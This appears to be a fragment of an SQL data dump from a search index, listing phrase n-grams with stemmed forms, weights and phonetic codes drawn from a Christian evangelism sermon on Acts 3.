(284057, 'in thy seed', 'in thy seed', 0, 1, 1.3667, 'I5323', 1, '*'),
(284058, 'in turning', 'in turning', 0, 1, 1.3333, 'I53652', 1, '*'),
(284059, 'in turning away', 'in turning away', 0, 1, 1.5, 'I53652', 1, '*'),
(284060, 'iniquities', 'iniqu', 0, 0, 0.6667, 'I5232', 1, '*'),
(284061, 'iniquities introduction', 'iniqu introduction', 0, 1, 1.7667, 'I52325363235', 1, '*'),
(284062, 'iniquities introduction today', 'iniqu introduction today', 0, 1, 1.9667, 'I523253632353', 1, '*'),
(284063, 'into the light', 'into the light', 0, 1, 1.4667, 'I53423', 1, '*'),
(284064, 'introduction today', 'introduct today', 0, 1, 1.6, 'I53632353', 1, '*'),
(284065, 'introduction today we', 'introduct today we', 0, 1, 1.7, 'I53632353', 1, '*'),
(284066, 'is god\'s creature', 'is god creature', 0, 1, 1.5667, 'I232636', 1, '*'),
(284067, 'is god\'s plan', 'is god plan', 0, 1, 1.4333, 'I232145', 1, '*'),
(284068, 'is in darkness', 'is in darkness', 0, 1, 1.4667, 'I2536252', 1, '*'),
(284069, 'is sinning', 'is sinning', 0, 1, 1.3333, 'I252', 1, '*'),
(284070, 'is sinning in', 'is sinning in', 0, 1, 1.4333, 'I2525', 1, '*'),
(284071, 'it as did', 'it as did', 0, 1, 1.3, 'I323', 1, '*'),
(284072, 'it shall come', 'it shall come', 0, 1, 1.4333, 'I32425', 1, '*'),
(284073, 'item 28', 'item 28', 0, 1, 1.2333, 'I350', 1, '*'),
(284074, 'item 28 salvation', 'item 28 salvation', 0, 1, 1.5667, 'I3524135', 1, '*'),
(284075, 'jesus sent', 'jesu sent', 0, 1, 1.3333, 'J530', 1, '*'),
(284076, 'jesus sent him', 'jesu sent him', 0, 1, 1.4667, 'J535', 1, '*'),
(284077, 'jesus the', 'jesu the', 0, 1, 1.3, 'J300', 1, '*'),
(284078, 'jesus the following', 'jesu the following', 0, 1, 1.6333, 'J31452', 1, '*'),
(284079, 'jesus would still', 'jesu would still', 0, 1, 1.5667, 'J43234', 1, '*'),
(284080, 'jesus\' death', 'jesu death', 0, 1, 1.4, 'J300', 1, '*'),
(284081, 'jesus\' death on', 'jesu death on', 0, 1, 1.5, 'J350', 1, '*'),
(284082, 'john 1', 'john 1', 0, 1, 1.2, 'J500', 1, '*'),
(284083, 'john 1 8', 'john 1 8', 0, 1, 1.2667, 'J500', 1, '*'),
(284084, 'judge him', 'judg him', 0, 1, 1.3, 'J325', 1, '*'),
(284085, 'judge him help', 'judg him help', 0, 1, 1.4667, 'J32541', 1, '*'),
(284086, 'k2 item 28', 'k2 item 28', 0, 1, 1.3333, 'K350', 1, '*'),
(284087, 'kindreds', 'kindr', 0, 0, 0.5333, 'K53632', 1, '*'),
(284088, 'kindreds of', 'kindr of', 0, 1, 1.3667, 'K536321', 1, '*'),
(284089, 'kindreds of the', 'kindr of the', 0, 1, 1.5, 'K5363213', 1, '*'),
(284090, 'know how he', 'know how he', 0, 1, 1.3667, 'K500', 1, '*'),
(284091, 'know that christ', 'know that christ', 0, 1, 1.5333, 'K532623', 1, '*'),
(284092, 'know what to', 'know what to', 0, 1, 1.4, 'K530', 1, '*'),
(284093, 'lead men', 'lead men', 0, 1, 1.2667, 'L350', 1, '*'),
(284094, 'lead men to', 'lead men to', 0, 1, 1.3667, 'L353', 1, '*'),
(284095, 'lead souls', 'lead souls', 0, 1, 1.3333, 'L3242', 1, '*'),
(284096, 'lead souls to', 'lead souls to', 0, 1, 1.4333, 'L32423', 1, '*'),
(284097, 'let him know', 'let him know', 0, 1, 1.4, 'L3525', 1, '*'),
(284098, 'light don\'t', 'light don', 0, 1, 1.3667, 'L2353', 1, '*'),
(284099, 'light don\'t judge', 'light don judge', 0, 1, 1.5667, 'L2353232', 1, '*'),
(284100, 'like unto', 'like unto', 0, 1, 1.3, 'L253', 1, '*'),
(284101, 'like unto me', 'like unto me', 0, 1, 1.4, 'L2535', 1, '*'),
(284102, 'likewise', 'likewis', 0, 0, 0.5333, 'L200', 1, '*'),
(284103, 'likewise foretold', 'likewis foretold', 0, 1, 1.5667, 'L216343', 1, '*'),
(284104, 'likewise foretold of', 'likewis foretold of', 0, 1, 1.6667, 'L2163431', 1, '*'),
(284105, 'lord your', 'lord your', 0, 1, 1.3, 'L636', 1, '*'),
(284106, 'lord your god', 'lord your god', 0, 1, 1.4333, 'L63623', 1, '*'),
(284107, 'lordship', 'lordship', 0, 0, 0.5333, 'L6321', 1, '*'),
(284108, 'lordship change', 'lordship change', 0, 1, 1.5, 'L6321252', 1, '*'),
(284109, 'lordship change of', 'lordship change of', 0, 1, 1.6, 'L63212521', 1, '*'),
(284110, 'love not', 'love not', 0, 1, 1.2667, 'L153', 1, '*'),
(284111, 'love not his', 'love not his', 0, 1, 1.4, 'L1532', 1, '*'),
(284112, 'loves him', 'love him', 0, 1, 1.3, 'L125', 1, '*'),
(284113, 'loves him that', 'love him that', 0, 1, 1.4667, 'L1253', 1, '*'),
(284114, 'made with our', 'made with our', 0, 1, 1.4333, 'M360', 1, '*'),
(284115, 'many as', 'mani as', 0, 1, 1.2333, 'M200', 1, '*'),
(284116, 'many as have', 'mani as have', 0, 1, 1.4, 'M210', 1, '*'),
(284117, 'may be muslim', 'mai be muslim', 0, 1, 1.4333, 'M15245', 1, '*'),
(284118, 'me him', 'me him', 0, 1, 1.2, 'M000', 1, '*'),
(284119, 'me him shall', 'me him shall', 0, 1, 1.4, 'M240', 1, '*'),
(284120, 'men to', 'men to', 0, 1, 1.2, 'M300', 2, '*'),
(284121, 'men to christ', 'men to christ', 0, 1, 1.4333, 'M32623', 1, '*'),
(284122, 'ministering', 'minist', 0, 0, 0.7333, 'M23652', 1, '*'),
(284123, 'ministering to', 'minist to', 0, 1, 1.4667, 'M236523', 1, '*'),
(284124, 'ministering to sinner', 'minist to sinner', 0, 1, 1.7, 'M236523256', 1, '*'),
(284125, 'moses truly', 'mose truly', 0, 1, 1.3667, 'M2364', 1, '*'),
(284126, 'moses truly said', 'mose truly said', 0, 1, 1.5333, 'M236423', 1, '*'),
(284127, 'mouth of all', 'mouth of all', 0, 1, 1.4, 'M314', 1, '*'),
(284128, 'move on', 'move on', 0, 1, 1.2333, 'M150', 1, '*'),
(284129, 'move on to', 'move on to', 0, 1, 1.3333, 'M153', 1, '*'),
(284130, 'much show', 'much show', 0, 1, 1.3, 'M200', 1, '*'),
(284131, 'much show him', 'much show him', 0, 1, 1.4333, 'M250', 1, '*'),
(284132, 'muslim', 'muslim', 0, 0, 0.4, 'M245', 1, '*'),
(284133, 'muslim celestial', 'muslim celestial', 0, 1, 1.5333, 'M24524234', 1, '*'),
(284134, 'muslim celestial c', 'muslim celestial c', 0, 1, 1.6, 'M245242342', 1, '*'),
(284135, 'must he', 'must he', 0, 1, 1.2333, 'M230', 1, '*'),
(284136, 'must he be', 'must he be', 0, 1, 1.3333, 'M231', 1, '*'),
(284137, 'must know what', 'must know what', 0, 1, 1.4667, 'M23253', 1, '*'),
(284138, 'must receive', 'must receive', 0, 1, 1.4, 'M23621', 1, '*'),
(284139, 'must receive until', 'must receive until', 0, 1, 1.6, 'M23621534', 1, '*'),
(284140, 'must switch', 'must switch', 0, 1, 1.3667, 'M23232', 1, '*'),
(284141, 'must switch from', 'must switch from', 0, 1, 1.5333, 'M23232165', 1, '*'),
(284142, 'my pastor', 'my pastor', 0, 1, 1.3, 'M1236', 1, '*'),
(284143, 'my pastor can', 'my pastor can', 0, 1, 1.4333, 'M123625', 1, '*'),
(284144, 'next week sunday', 'next week sunday', 0, 1, 1.5333, 'N23253', 1, '*'),
(284145, 'not hear', 'not hear', 0, 1, 1.2667, 'N360', 1, '*'),
(284146, 'not hear that', 'not hear that', 0, 1, 1.4333, 'N363', 1, '*'),
(284147, 'not his', 'not his', 0, 1, 1.2333, 'N320', 1, '*'),
(284148, 'not his shortcomings', 'not his shortcomings', 0, 1, 1.6667, 'N3263252', 1, '*'),
(284149, 'not save', 'not save', 0, 1, 1.2667, 'N321', 1, '*'),
(284150, 'not save the', 'not save the', 0, 1, 1.4, 'N3213', 1, '*'),
(284151, 'now brethren', 'now brethren', 0, 1, 1.4, 'N16365', 1, '*'),
(284152, 'now brethren i', 'now brethren i', 0, 1, 1.4667, 'N16365', 1, '*'),
(284153, 'occultist', 'occultist', 0, 0, 0.6, 'O24323', 1, '*'),
(284154, 'occultist help', 'occultist help', 0, 1, 1.4667, 'O2432341', 1, '*'),
(284155, 'occultist help him', 'occultist help him', 0, 1, 1.6, 'O24323415', 1, '*'),
(284156, 'of all his', 'of all his', 0, 1, 1.3333, 'O142', 1, '*'),
(284157, 'of all things', 'of all things', 0, 1, 1.4333, 'O14352', 1, '*'),
(284158, 'of heart change', 'of heart change', 0, 1, 1.5, 'O163252', 1, '*'),
(284159, 'of jesus\'', 'of jesus', 0, 1, 1.3, 'O120', 1, '*'),
(284160, 'of jesus\' death', 'of jesus death', 0, 1, 1.5, 'O123', 1, '*'),
(284161, 'of lordship', 'of lordship', 0, 1, 1.3667, 'O146321', 1, '*'),
(284162, 'of lordship change', 'of lordship change', 0, 1, 1.6, 'O146321252', 1, '*'),
(284163, 'of ministering', 'of ministering', 0, 1, 1.4667, 'O1523652', 1, '*'),
(284164, 'of ministering to', 'of ministering to', 0, 1, 1.5667, 'O15236523', 1, '*'),
(284165, 'of restitution', 'of restitution', 0, 1, 1.4667, 'O16235', 1, '*'),
(284166, 'of restitution of', 'of restitution of', 0, 1, 1.5667, 'O162351', 1, '*'),
(284167, 'of salvation', 'of salvation', 0, 1, 1.4, 'O124135', 1, '*'),
(284168, 'of salvation in', 'of salvation in', 0, 1, 1.5, 'O124135', 1, '*'),
(284169, 'of the covenant', 'of the covenant', 0, 1, 1.5, 'O132153', 1, '*'),
(284170, 'of the prophets', 'of the prophets', 0, 1, 1.5, 'O1316132', 1, '*'),
(284171, 'of these days', 'of these days', 0, 1, 1.4333, 'O13232', 1, '*'),
(284172, 'of ways', 'of ways', 0, 1, 1.2333, 'O120', 1, '*'),
(284173, 'of ways etc', 'of ways etc', 0, 1, 1.3667, 'O1232', 1, '*'),
(284174, 'of you from', 'of you from', 0, 1, 1.3667, 'O165', 1, '*'),
(284175, 'of your brethren', 'of your brethren', 0, 1, 1.5333, 'O1616365', 1, '*'),
(284176, 'on to see', 'on to see', 0, 1, 1.3, 'O532', 1, '*'),
(284177, 'one of you', 'on of you', 0, 1, 1.3333, 'O510', 1, '*'),
(284178, 'only gives', 'onli gives', 0, 1, 1.3333, 'O54212', 1, '*'),
(284179, 'only gives 1', 'onli gives 1', 0, 1, 1.4, 'O54212', 1, '*'),
(284180, 'only sinner', 'onli sinner', 0, 1, 1.3667, 'O54256', 1, '*'),
(284181, 'only sinner jesus', 'onli sinner jesus', 0, 1, 1.5667, 'O542562', 1, '*'),
(284182, 'or cheating', 'or cheating', 0, 1, 1.3667, 'O62352', 1, '*'),
(284183, 'or cheating come', 'or cheating come', 0, 1, 1.5333, 'O623525', 1, '*'),
(284184, 'or womanizing', 'or womanizing', 0, 1, 1.4333, 'O65252', 1, '*'),
(284185, 'or womanizing or', 'or womanizing or', 0, 1, 1.5333, 'O652526', 1, '*'),
(284186, 'other things verse', 'other things verse', 0, 1, 1.6, 'O36352162', 1, '*'),
(284187, 'our church', 'our church', 0, 1, 1.3333, 'O6262', 1, '*'),
(284188, 'our church next', 'our church next', 0, 1, 1.5, 'O6262523', 1, '*'),
(284189, 'our fathers', 'our fathers', 0, 1, 1.3667, 'O61362', 1, '*'),
(284190, 'our fathers saying', 'our fathers saying', 0, 1, 1.6, 'O6136252', 1, '*'),
(284191, 'pass that', 'pass that', 0, 1, 1.3, 'P230', 1, '*'),
(284192, 'pass that every', 'pass that every', 0, 1, 1.5, 'P2316', 1, '*'),
(284193, 'pastor can', 'pastor can', 0, 1, 1.3333, 'P23625', 1, '*'),
(284194, 'pastor can pray', 'pastor can pray', 0, 1, 1.5, 'P2362516', 1, '*'),
(284195, 'people 24', 'peopl 24', 0, 1, 1.3, 'P400', 1, '*'),
(284196, 'people 24 yea', 'peopl 24 yea', 0, 1, 1.4333, 'P400', 1, '*'),
(284197, 'plan for his', 'plan for his', 0, 1, 1.4, 'P45162', 1, '*'),
(284198, 'points are', 'point are', 0, 1, 1.3333, 'P5326', 1, '*'),
(284199, 'points are good', 'point are good', 0, 1, 1.5, 'P532623', 1, '*'),
(284200, 'points in', 'point in', 0, 1, 1.3, 'P5325', 1, '*'),
(284201, 'points in the', 'point in the', 0, 1, 1.4333, 'P53253', 1, '*'),
(284202, 'pray for you', 'prai for you', 0, 1, 1.4, 'P616', 1, '*'),
(284203, 'preached', 'preach', 0, 0, 0.5333, 'P623', 1, '*'),
(284204, 'preached unto', 'preach unto', 0, 1, 1.4333, 'P62353', 1, '*'),
(284205, 'preached unto you', 'preach unto you', 0, 1, 1.5667, 'P62353', 1, '*'),
(284206, 'privilege of', 'privileg of', 0, 1, 1.4, 'P61421', 1, '*'),
(284207, 'privilege of ministering', 'privileg of ministering', 0, 1, 1.8, 'P61421523652', 1, '*'),
(284208, 'problem will', 'problem will', 0, 1, 1.4, 'P61454', 1, '*'),
(284209, 'problem will go', 'problem will go', 0, 1, 1.5, 'P614542', 1, '*'),
(284210, 'prophet shall', 'prophet shall', 0, 1, 1.4333, 'P61324', 1, '*'),
(284211, 'prophet shall be', 'prophet shall be', 0, 1, 1.5333, 'P613241', 1, '*'),
(284212, 'prophet shall the', 'prophet shall the', 0, 1, 1.5667, 'P613243', 1, '*'),
(284213, 'prophets and of', 'prophet and of', 0, 1, 1.5, 'P6132531', 1, '*'),
(284214, 'prophets from', 'prophet from', 0, 1, 1.4333, 'P6132165', 1, '*'),
(284215, 'prophets from samuel', 'prophet from samuel', 0, 1, 1.6667, 'P6132165254', 1, '*'),
(284216, 'prophets since', 'prophet since', 0, 1, 1.4667, 'P613252', 1, '*'),
(284217, 'prophets since the', 'prophet since the', 0, 1, 1.6, 'P6132523', 1, '*'),
(284218, 'prophets that', 'prophet that', 0, 1, 1.4333, 'P61323', 1, '*'),
(284219, 'prophets that christ', 'prophet that christ', 0, 1, 1.6667, 'P613232623', 1, '*'),
(284220, 'raise up', 'rais up', 0, 1, 1.2667, 'R210', 1, '*'),
(284221, 'raise up unto', 'rais up unto', 0, 1, 1.4333, 'R2153', 1, '*'),
(284222, 'raised up', 'rais up', 0, 1, 1.3, 'R231', 1, '*'),
(284223, 'raised up his', 'rais up his', 0, 1, 1.4333, 'R2312', 1, '*'),
(284224, 'receive until', 'receiv until', 0, 1, 1.4333, 'R21534', 1, '*'),
(284225, 'receive until the', 'receiv until the', 0, 1, 1.5667, 'R215343', 1, '*'),
(284226, 'repent ye', 'repent ye', 0, 1, 1.3, 'R153', 1, '*'),
(284227, 'repent ye therefore', 'repent ye therefore', 0, 1, 1.6333, 'R153616', 1, '*'),
(284228, 'repentance change', 'repent change', 0, 1, 1.5667, 'R1535252', 1, '*'),
(284229, 'repentance change of', 'repent change of', 0, 1, 1.6667, 'R15352521', 1, '*'),
(284230, 'restitution', 'restitut', 0, 0, 0.7333, 'R235', 1, '*'),
(284231, 'restitution of', 'restitut of', 0, 1, 1.4667, 'R2351', 1, '*'),
(284232, 'restitution of all', 'restitut of all', 0, 1, 1.6, 'R23514', 1, '*'),
(284233, 'resurrection', 'resurrect', 0, 0, 0.8, 'R26235', 1, '*'),
(284234, 'resurrection to', 'resurrect to', 0, 1, 1.5, 'R262353', 1, '*'),
(284235, 'resurrection to bring', 'resurrect to bring', 0, 1, 1.7, 'R2623531652', 1, '*'),
(284236, 'roots', 'root', 0, 0, 0.3333, 'R320', 1, '*'),
(284237, 'roots back', 'root back', 0, 1, 1.3333, 'R3212', 1, '*'),
(284238, 'roots back to', 'root back to', 0, 1, 1.4333, 'R32123', 1, '*'),
(284239, 'rulers', 'ruler', 0, 0, 0.4, 'R462', 1, '*'),
(284240, 'rulers 18', 'ruler 18', 0, 1, 1.3, 'R462', 1, '*'),
(284241, 'rulers 18 but', 'ruler 18 but', 0, 1, 1.4333, 'R46213', 1, '*'),
(284242, 's occultist', 's occultist', 0, 1, 1.3667, 'S4323', 1, '*'),
(284243, 's occultist help', 's occultist help', 0, 1, 1.5333, 'S432341', 1, '*'),
(284244, 'said unto the', 'said unto the', 0, 1, 1.4333, 'S353', 1, '*'),
(284245, 'salvation if', 'salvat if', 0, 1, 1.4, 'S41351', 1, '*'),
(284246, 'salvation if he', 'salvat if he', 0, 1, 1.5, 'S41351', 1, '*'),
(284247, 'salvation in', 'salvat in', 0, 1, 1.4, 'S4135', 1, '*'),
(284248, 'salvation in attempting', 'salvat in attempting', 0, 1, 1.7667, 'S4135351352', 1, '*'),
(284249, 'samuel and those', 'samuel and those', 0, 1, 1.5333, 'S54532', 1, '*'),
(284250, 'save him', 'save him', 0, 1, 1.2667, 'S150', 1, '*'),
(284251, 'save him god', 'save him god', 0, 1, 1.4, 'S1523', 1, '*'),
(284252, 'save the', 'save the', 0, 1, 1.2667, 'S130', 1, '*'),
(284253, 'save the sinner', 'save the sinner', 0, 1, 1.5, 'S13256', 1, '*'),
(284254, 'say unto', 'sai unto', 0, 1, 1.2667, 'S530', 1, '*'),
(284255, 'say unto you', 'sai unto you', 0, 1, 1.4, 'S530', 1, '*'),
(284256, 'saying unto', 'sai unto', 0, 1, 1.3667, 'S5253', 1, '*'),
(284257, 'saying unto abraham', 'sai unto abraham', 0, 1, 1.6333, 'S5253165', 1, '*'),
(284258, 'see the critical', 'see the critical', 0, 1, 1.5333, 'S326324', 1, '*'),
(284259, 'seed shall', 'seed shall', 0, 1, 1.3333, 'S324', 1, '*'),
(284260, 'seed shall all', 'seed shall all', 0, 1, 1.4667, 'S324', 1, '*'),
(284261, 'self to', 'self to', 0, 1, 1.2333, 'S413', 1, '*'),
(284262, 'self to following', 'self to following', 0, 1, 1.5667, 'S4131452', 1, '*'),
(284263, 'send jesus', 'send jesus', 0, 1, 1.3333, 'S532', 1, '*'),
(284264, 'send jesus christ', 'send jesus christ', 0, 1, 1.5667, 'S532623', 1, '*'),
(284265, 'sent him', 'sent him', 0, 1, 1.2667, 'S535', 2, '*'),
(284266, 'sent him to', 'sent him to', 0, 1, 1.3667, 'S5353', 1, '*'),
(284267, 'shall all', 'shall all', 0, 1, 1.3, 'S400', 1, '*'),
(284268, 'shall all the', 'shall all the', 0, 1, 1.4333, 'S430', 1, '*'),
(284269, 'shall be destroyed', 'shall be destroyed', 0, 1, 1.6, 'S4132363', 1, '*'),
(284270, 'shall come to', 'shall come to', 0, 1, 1.4333, 'S4253', 1, '*'),
(284271, 'shall say', 'shall say', 0, 1, 1.3, 'S420', 1, '*'),
(284272, 'shall say unto', 'shall say unto', 0, 1, 1.4667, 'S4253', 1, '*'),
(284273, 'shall send', 'shall send', 0, 1, 1.3333, 'S4253', 1, '*'),
(284274, 'shall send jesus', 'shall send jesus', 0, 1, 1.5333, 'S42532', 1, '*'),
(284275, 'shall the lord', 'shall the lord', 0, 1, 1.4667, 'S43463', 1, '*'),
(284276, 'shall ye', 'shall ye', 0, 1, 1.2667, 'S400', 1, '*'),
(284277, 'shall ye hear', 'shall ye hear', 0, 1, 1.4333, 'S460', 1, '*'),
(284278, 'share that', 'share that', 0, 1, 1.3333, 'S630', 2, '*'),
(284279, 'share that will', 'share that will', 0, 1, 1.5, 'S634', 1, '*'),
(284280, 'shewed', 'shew', 0, 0, 0.4, 'S300', 1, '*'),
(284281, 'shewed by', 'shew by', 0, 1, 1.3, 'S310', 1, '*'),
(284282, 'shewed by the', 'shew by the', 0, 1, 1.4333, 'S313', 1, '*'),
(284283, 'shortcomings', 'shortcom', 0, 0, 0.8, 'S63252', 1, '*'),
(284284, 'shortcomings verse', 'shortcom verse', 0, 1, 1.6, 'S63252162', 1, '*'),
(284285, 'shortcomings verse 19', 'shortcom verse 19', 0, 1, 1.7, 'S63252162', 1, '*'),
(284286, 'should suffer', 'should suffer', 0, 1, 1.4333, 'S43216', 1, '*'),
(284287, 'should suffer he', 'should suffer he', 0, 1, 1.5333, 'S43216', 1, '*'),
(284288, 'show him', 'show him', 0, 1, 1.2667, 'S500', 1, '*'),
(284289, 'show him god\'s', 'show him god', 0, 1, 1.4667, 'S5232', 1, '*'),
(284290, 'since the', 'sinc the', 0, 1, 1.3, 'S523', 1, '*'),
(284291, 'since the world', 'sinc the world', 0, 1, 1.5, 'S523643', 1, '*'),
(284292, 'sinner jesus', 'sinner jesus', 0, 1, 1.4, 'S562', 1, '*'),
(284293, 'sinner jesus would', 'sinner jesus would', 0, 1, 1.6, 'S56243', 1, '*'),
(284294, 'sinner stop', 'sinner stop', 0, 1, 1.3667, 'S56231', 1, '*'),
(284295, 'sinner stop smoking', 'sinner stop smoking', 0, 1, 1.6333, 'S5623125252', 1, '*'),
(284296, 'sinner the', 'sinner the', 0, 1, 1.3333, 'S563', 1, '*'),
(284297, 'sinner the truths', 'sinner the truths', 0, 1, 1.5667, 'S563632', 1, '*'),
(284298, 'sinner what', 'sinner what', 0, 1, 1.3667, 'S563', 1, '*'),
(284299, 'sinner what must', 'sinner what must', 0, 1, 1.5333, 'S563523', 1, '*'),
(284300, 'sinning', 'sin', 0, 0, 0.4667, 'S520', 1, '*'),
(284301, 'sinning in', 'sin in', 0, 1, 1.3333, 'S525', 1, '*'),
(284302, 'sinning in ignorance', 'sin in ignorance', 0, 1, 1.6667, 'S52525652', 1, '*'),
(284303, 'smoking', 'smoke', 0, 0, 0.4667, 'S5252', 1, '*'),
(284304, 'smoking cigarettes', 'smoke cigarettes', 0, 1, 1.6, 'S5252632', 1, '*'),
(284305, 'smoking cigarettes or', 'smoke cigarettes or', 0, 1, 1.7, 'S52526326', 1, '*'),
(284306, 'so fulfilled', 'so fulfilled', 0, 1, 1.4, 'S14143', 1, '*'),
(284307, 'so fulfilled 19', 'so fulfilled 19', 0, 1, 1.5, 'S14143', 1, '*'),
(284308, 'son jesus', 'son jesus', 0, 1, 1.3, 'S520', 1, '*'),
(284309, 'son jesus sent', 'son jesus sent', 0, 1, 1.4667, 'S5253', 1, '*'),
(284310, 'soul which will', 'soul which will', 0, 1, 1.5, 'S424', 1, '*'),
(284311, 'souls to', 'soul to', 0, 1, 1.2667, 'S423', 1, '*'),
(284312, 'souls to christ', 'soul to christ', 0, 1, 1.5, 'S4232623', 1, '*'),
(284313, 'spoken by', 'spoken by', 0, 1, 1.3, 'S1251', 1, '*'),
(284314, 'spoken by the', 'spoken by the', 0, 1, 1.4333, 'S12513', 1, '*'),
(284315, 'spoken have', 'spoken have', 0, 1, 1.3667, 'S1251', 1, '*'),
(284316, 'spoken have likewise', 'spoken have likewise', 0, 1, 1.6667, 'S125142', 1, '*'),
(284317, 'still have come', 'still have come', 0, 1, 1.5, 'S34125', 1, '*'),
(284318, 'stop smoking', 'stop smoking', 0, 1, 1.4, 'S3125252', 1, '*'),
(284319, 'stop smoking cigarettes', 'stop smoking cigarettes', 0, 1, 1.7667, 'S3125252632', 1, '*'),
(284320, 'suffer he', 'suffer he', 0, 1, 1.3, 'S160', 1, '*'),
(284321, 'suffer he hath', 'suffer he hath', 0, 1, 1.4667, 'S163', 1, '*'),
(284322, 'sunday my', 'sundai my', 0, 1, 1.3, 'S535', 1, '*'),
(284323, 'sunday my pastor', 'sundai my pastor', 0, 1, 1.5333, 'S5351236', 1, '*'),
(284324, 'switch', 'switch', 0, 0, 0.4, 'S320', 1, '*'),
(284325, 'switch from', 'switch from', 0, 1, 1.3667, 'S32165', 1, '*'),
(284326, 'switch from following', 'switch from following', 0, 1, 1.7, 'S321651452', 1, '*'),
(284327, 'tell him about', 'tell him about', 0, 1, 1.4667, 'T4513', 1, '*'),
(284328, 'tell the', 'tell the', 0, 1, 1.2667, 'T430', 2, '*'),
(284329, 'tell the sinner', 'tell the sinner', 0, 1, 1.5, 'T43256', 1, '*'),
(284330, 'text acts', 'text acts', 0, 1, 1.3, 'T23232', 1, '*'),
(284331, 'text acts 3', 'text acts 3', 0, 1, 1.3667, 'T23232', 1, '*'),
(284332, 'that christ is', 'that christ is', 0, 1, 1.4667, 'T26232', 1, '*'),
(284333, 'that christ should', 'that christ should', 0, 1, 1.6, 'T2623243', 1, '*'),
(284334, 'that every soul', 'that every soul', 0, 1, 1.5, 'T1624', 1, '*'),
(284335, 'that follow after', 'that follow after', 0, 1, 1.5667, 'T14136', 1, '*'),
(284336, 'that god only', 'that god only', 0, 1, 1.4333, 'T2354', 1, '*'),
(284337, 'that much', 'that much', 0, 1, 1.3, 'T520', 1, '*'),
(284338, 'that much show', 'that much show', 0, 1, 1.4667, 'T520', 1, '*'),
(284339, 'that prophet', 'that prophet', 0, 1, 1.4, 'T1613', 1, '*'),
(284340, 'that prophet shall', 'that prophet shall', 0, 1, 1.6, 'T161324', 1, '*'),
(284341, 'that through', 'that through', 0, 1, 1.4, 'T620', 1, '*'),
(284342, 'that through ignorance', 'that through ignorance', 0, 1, 1.7333, 'T625652', 1, '*'),
(284343, 'that will touch', 'that will touch', 0, 1, 1.5, 'T432', 1, '*'),
(284344, 'the covenant which', 'the covenant which', 0, 1, 1.6, 'T21532', 1, '*'),
(284345, 'the critical', 'the critical', 0, 1, 1.4, 'T26324', 1, '*'),
(284346, 'the critical points', 'the critical points', 0, 1, 1.6333, 'T263241532', 1, '*'),
(284347, 'the cross and', 'the cross and', 0, 1, 1.4333, 'T26253', 1, '*'),
(284348, 'the extent', 'the extent', 0, 1, 1.3333, 'T2353', 1, '*'),
(284349, 'the extent of', 'the extent of', 0, 1, 1.4333, 'T23531', 1, '*'),
(284350, 'the fathers', 'the fathers', 0, 1, 1.3667, 'T1362', 1, '*'),
(284351, 'the fathers a', 'the fathers a', 0, 1, 1.4333, 'T1362', 1, '*'),
(284352, 'the forgiveness', 'the forgiveness', 0, 1, 1.5, 'T162152', 1, '*'),
(284353, 'the forgiveness that', 'the forgiveness that', 0, 1, 1.6667, 'T1621523', 1, '*'),
(284354, 'the heaven', 'the heaven', 0, 1, 1.3333, 'T150', 1, '*'),
(284355, 'the heaven must', 'the heaven must', 0, 1, 1.5, 'T1523', 1, '*'),
(284356, 'the kindreds', 'the kindreds', 0, 1, 1.4, 'T253632', 1, '*'),
(284357, 'the kindreds of', 'the kindreds of', 0, 1, 1.5, 'T2536321', 1, '*'),
(284358, 'the light', 'the light', 0, 1, 1.3, 'T423', 1, '*'),
(284359, 'the light don\'t', 'the light don', 0, 1, 1.5, 'T42353', 1, '*'),
(284360, 'the lord your', 'the lord your', 0, 1, 1.4333, 'T4636', 1, '*'),
(284361, 'the only sinner', 'the only sinner', 0, 1, 1.5, 'T54256', 1, '*'),
(284362, 'the people 24', 'the people 24', 0, 1, 1.4333, 'T140', 1, '*'),
(284363, 'the privilege', 'the privilege', 0, 1, 1.4333, 'T16142', 1, '*'),
(284364, 'the privilege of', 'the privilege of', 0, 1, 1.5333, 'T161421', 1, '*'),
(284365, 'the prophets', 'the prophets', 0, 1, 1.4, 'T16132', 1, '*'),
(284366, 'the prophets and', 'the prophets and', 0, 1, 1.5333, 'T1613253', 1, '*'),
(284367, 'the prophets from', 'the prophets from', 0, 1, 1.5667, 'T16132165', 1, '*'),
(284368, 'the resurrection', 'the resurrection', 0, 1, 1.5333, 'T626235', 1, '*'),
(284369, 'the resurrection to', 'the resurrection to', 0, 1, 1.6333, 'T6262353', 1, '*'),
(284370, 'the sinner', 'the sinner', 0, 1, 1.3333, 'T256', 1, '*'),
(284371, 'the sinner stop', 'the sinner stop', 0, 1, 1.5, 'T256231', 1, '*'),
(284372, 'the sinner the', 'the sinner the', 0, 1, 1.4667, 'T2563', 1, '*'),
(284373, 'the truths to', 'the truths to', 0, 1, 1.4333, 'T6323', 1, '*'),
(284374, 'the world began', 'the world began', 0, 1, 1.5, 'T643125', 1, '*'),
(284375, 'their hearts', 'their hearts', 0, 1, 1.4, 'T632', 1, '*'),
(284376, 'their hearts for', 'their hearts for', 0, 1, 1.5333, 'T63216', 1, '*'),
(284377, 'these days 25', 'these days 25', 0, 1, 1.4333, 'T232', 1, '*'),
(284378, 'things verse', 'thing verse', 0, 1, 1.4, 'T52162', 1, '*'),
(284379, 'things verse 17', 'thing verse 17', 0, 1, 1.5, 'T52162', 1, '*'),
(284380, 'things whatsoever', 'thing whatsoever', 0, 1, 1.5667, 'T523216', 1, '*'),
(284381, 'things whatsoever he', 'thing whatsoever he', 0, 1, 1.6667, 'T523216', 1, '*'),
(284382, 'things which', 'thing which', 0, 1, 1.4, 'T520', 1, '*'),
(284383, 'things which god', 'thing which god', 0, 1, 1.5333, 'T523', 1, '*'),
(284384, 'those that follow', 'those that follow', 0, 1, 1.5667, 'T2314', 1, '*'),
(284385, 'those things which', 'those things which', 0, 1, 1.6, 'T2352', 1, '*'),
(284386, 'through ignorance', 'through ignorance', 0, 1, 1.5667, 'T625652', 1, '*'),
(284387, 'through ignorance ye', 'through ignorance ye', 0, 1, 1.6667, 'T625652', 1, '*'),
(284388, 'thy seed', 'thy seed', 0, 1, 1.2667, 'T230', 1, '*'),
(284389, 'thy seed shall', 'thy seed shall', 0, 1, 1.4667, 'T2324', 1, '*'),
(284390, 'times of restitution', 'time of restitution', 0, 1, 1.6667, 'T5216235', 1, '*'),
(284391, 'to bless', 'to bless', 0, 1, 1.2667, 'T142', 2, '*'),
(284392, 'to bless you', 'to bless you', 0, 1, 1.4, 'T142', 1, '*'),
(284393, 'to bring him', 'to bring him', 0, 1, 1.4, 'T16525', 1, '*'),
(284394, 'to christ', 'to christ', 0, 1, 1.3, 'T2623', 2, '*'),
(284395, 'to christ in', 'to christ in', 0, 1, 1.4, 'T26235', 2, '*'),
